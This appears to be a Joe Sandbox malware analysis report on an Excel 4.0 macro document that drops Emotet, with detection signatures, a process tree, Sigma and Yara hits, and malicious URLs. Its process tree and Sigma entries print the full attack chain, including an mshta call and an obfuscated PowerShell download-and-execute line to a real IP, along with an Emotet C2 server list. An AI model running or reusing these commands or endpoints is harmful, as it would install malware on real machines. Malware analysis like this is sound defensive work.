Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2022-28-01_1202.xls

Overview

General Information

Sample Name:2022-28-01_1202.xls
Analysis ID:562524
MD5:e31371453defbbf8840b40b5bff8600a
SHA1:bf7b00bc9192d147adc9d2fa52c69fe796e55d67
SHA256:7649a43612652c0b32353e7ae9898150f885a770db0d024d0d034c4171d5d684
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2920 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2832 cmdline: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 1928 cmdline: mshta http://91.240.118.172/gg/ff/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 1160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2548 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2712 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2640 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1276 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2792 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 512 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 1272 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
2022-28-01_1202.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
2022-28-01_1202.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\2022-28-01_1202.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x12ca2:$s1: Excel
    • 0x13d08:$s1: Excel
    • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\2022-28-01_1202.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\ProgramData\JooSee.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            00000011.00000002.667870525.0000000002DF1000.00000020.00000001.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0000000C.00000002.565617411.0000000000140000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000C.00000002.566094968.0000000002380000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 73 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  15.2.rundll32.exe.a50000.4.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    12.2.rundll32.exe.180000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      10.2.rundll32.exe.2860000.8.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        15.2.rundll32.exe.220000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          17.2.rundll32.exe.2a0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 108 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 1928, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1160
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2832, ProcessCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 1928
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2920, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2832
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1160
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1160
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1160

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://maxtdeveloper.com/okw9yx/Avira URL Cloud: Label: malware
                            Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.html4Avira URL Cloud: Label: malware
                            Source: http://it-o.biz/bitrix/xoDdDe/PE3Avira URL Cloud: Label: malware
                            Source: http://www.inablr.com/elenctic/fAvira URL Cloud: Label: malware
                            Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3Avira URL Cloud: Label: malware
                            Source: http://hostfeeling.com/wp-admin/Avira URL Cloud: Label: malware
                            Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3Avira URL Cloud: Label: malware
                            Source: https://property-eg.com/mlzkir/97v/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.pngAvira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.pngPE3Avira URL Cloud: Label: malware
                            Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3Avira URL Cloud: Label: malware
                            Source: http://bimesarayenovin.ir/wp-admAvira URL Cloud: Label: malware
                            Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.htmlAvira URL Cloud: Label: malware
                            Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/Avira URL Cloud: Label: malware
                            Source: http://hostfeeling.comAvira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.comAvira URL Cloud: Label: malware
                            Source: http://it-o.biz/Avira URL Cloud: Label: malware
                            Source: http://jurnalpjf.lan.go.id/assets/iM/Avira URL Cloud: Label: malware
                            Source: http://activetraining.sytes.net/Avira URL Cloud: Label: malware
                            Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3Avira URL Cloud: Label: malware
                            Source: https://gudangtasorichina.com/wp-content/GG01c/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlvAvira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlngsAvira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlmshtaAvira URL Cloud: Label: malware
